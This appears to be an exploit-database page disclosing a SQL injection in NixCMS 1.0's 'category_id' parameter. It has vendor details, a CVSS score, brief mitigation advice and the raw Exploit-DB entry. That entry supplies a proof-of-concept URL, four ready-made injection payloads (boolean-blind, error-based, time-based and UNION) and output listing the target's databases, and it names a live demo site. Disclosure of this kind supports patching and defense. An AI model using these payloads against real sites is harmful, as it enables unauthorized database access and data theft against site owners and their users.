header-logo
Suggest Exploit
vendor:
NixCMS
by:
Bora Bozdogan
7.5
CVSS
HIGH
SQL Ýnjection
89
CWE
Product Name: NixCMS
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:nixdesign:nixcms:1.0
Metasploit:
Other Scripts:
Platforms Tested: WiN10_X64
2018

NixCMS 1.0 – ‘category_id’ SQL Ýnjection

The NixCMS 1.0 version is vulnerable to SQL Ýnjection in the 'category_id' parameter. The SQL Ýnjection allows an attacker to manipulate the SQL query and execute arbitrary SQL commands. This can lead to unauthorized access, data leakage, or even complete system compromise.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Prepared statements or parameterized queries should be used to prevent SQL Ýnjection attacks. Regular security updates and patches from the vendor should be applied.
Source

Exploit-DB raw data:

# #
# Exploit Title: NixCMS 1.0 - 'category_id' SQL Ýnjection
# Dork: N/A
# Date: 03.02.2018
# Vendor: https://www.nixdesign.de
# Software Link: https://www.nixdesign.de/nix-cms/
# Demo: http://www.jamaram.de/
# Version: 1.0
# Tested on: WiN10_X64
# Exploit Author: Bora Bozdogan
# Author WebSite : http://borabozdogan.net.tr
# Author E-mail : borayazilim45@mit.tc
# Author Skype : borayazilim45
# # 
# POC:
# 
# http://localhost/[PATH]/single.php?category_id=[SQL]
# 
# Parameter: category_id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: category_id=24' AND 1662=1662 AND 'ZFBe'='ZFBe
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: category_id=24' AND (SELECT 3422 FROM(SELECT COUNT(*),CONCAT(0x71706a7171,(SELECT (ELT(3422=3422,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CjtO'='CjtO
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
#
# Payload: category_id=24' AND SLEEP(5) AND 'kjea'='kjea
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 15 columns
# Payload: category_id=24' UNION ALL SELECT NULL,CONCAT(0x71706a7171,0x6953455a5149636b5844654f6f6d4e74506c6b73465572725544644e584158745065566267437574,0x717a627071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wFQF
#
# #

available databases [3]:
[*] information_schema
[*] usr_web24_1
[*] web24_4

Navigation

Suggest Exploit

Services By CQR